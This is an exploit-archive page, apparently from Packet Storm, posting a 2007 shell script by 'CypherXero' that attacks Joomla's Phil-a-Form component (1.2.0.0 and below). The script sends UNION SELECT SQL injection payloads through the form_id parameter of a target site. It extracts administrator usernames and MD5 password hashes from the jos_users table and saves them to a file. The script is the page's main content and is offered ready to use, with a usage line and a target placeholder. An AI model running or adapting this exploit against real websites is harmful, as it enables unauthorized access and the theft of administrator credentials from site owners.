Exploit the possiblities

jcpf-sql.txt

jcpf-sql.txt
Posted May 30, 2007
Authored by Cody "CypherXero" Rester | Site cypherxero.net

Joomla Component Phil-a-Form versions 1.2.0.0 and below remote SQL injection exploit.

tags | exploit, remote, sql injection
MD5 | 7b230309b2dc27df84cd928e0612a621

jcpf-sql.txt

Change Mirror Download
#!/bin/sh

#################################################################################
# #
# Joomla Component Phil-a-Form <= 1.2.0.0 SQL Injection Exploit #
# #
# Discovered by: Cody "CypherXero" Rester #
# Payload: Admin Username and MD5 Hash Retrieval #
# Website: http://www.cypherxero.net #
# Shoutouts to the milw0rm community, the PIMP forums #
# and my blog, of course #
# #
#################################################################################

echo "-------------------------------------------------------------------------"
echo " Joomla Component Phil-a-Form <= 1.2.0.0 SQL Injection Exploit"
echo "-------------------------------------------------------------------------"
echo "Usage: sql_philaform_jos.sh [HOST] [FORM_ID]"
echo "[HOST] = Hostname of targetwebsite"
echo "[FORM_ID] = Form ID of Phil-a-Form post"
echo "e.g. sql_philaform_jos.sh http://www.targethost.com 2"
echo "-------------------------------------------------------------------------"
echo " Cody CypherXero Rester"
echo " http://www.cypherxero.net"
echo "-------------------------------------------------------------------------"

jos_username="%20UNION%20SELECT%20null,null,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20jos_users%20--"
jos_password="%20UNION%20SELECT%20null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20jos_users%20--"
host="$1"
form_id="$2"

if [ "$form_id" == "" ]
then
echo "Syntax not correct! See usage example!"
exit 1
else
echo ""
fi

echo "Username" > $host.txt
echo "--------" >> $host.txt
links -dump "http://$host/index.php?option=com_philaform&form_id=$form_id$jos_username" | grep -i "philaform_" | awk -F\_ '{ print $2 }' | awk '{ print $1 }' >> $host.txt
echo " " >> $host.txt
echo "MD5 Password Hash" >> $host.txt
echo "-----------------" >> $host.txt
links -dump "http://$host/index.php?option=com_philaform&form_id=$form_id$jos_password" | grep -i "philaform_" | awk -F\_ '{ print $2 }' | awk '{ print $1 }' >> $host.txt

echo ""
cat $host.txt

exit 0

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    2 Files
  • 19
    Feb 19th
    16 Files
  • 20
    Feb 20th
    11 Files
  • 21
    Feb 21st
    3 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close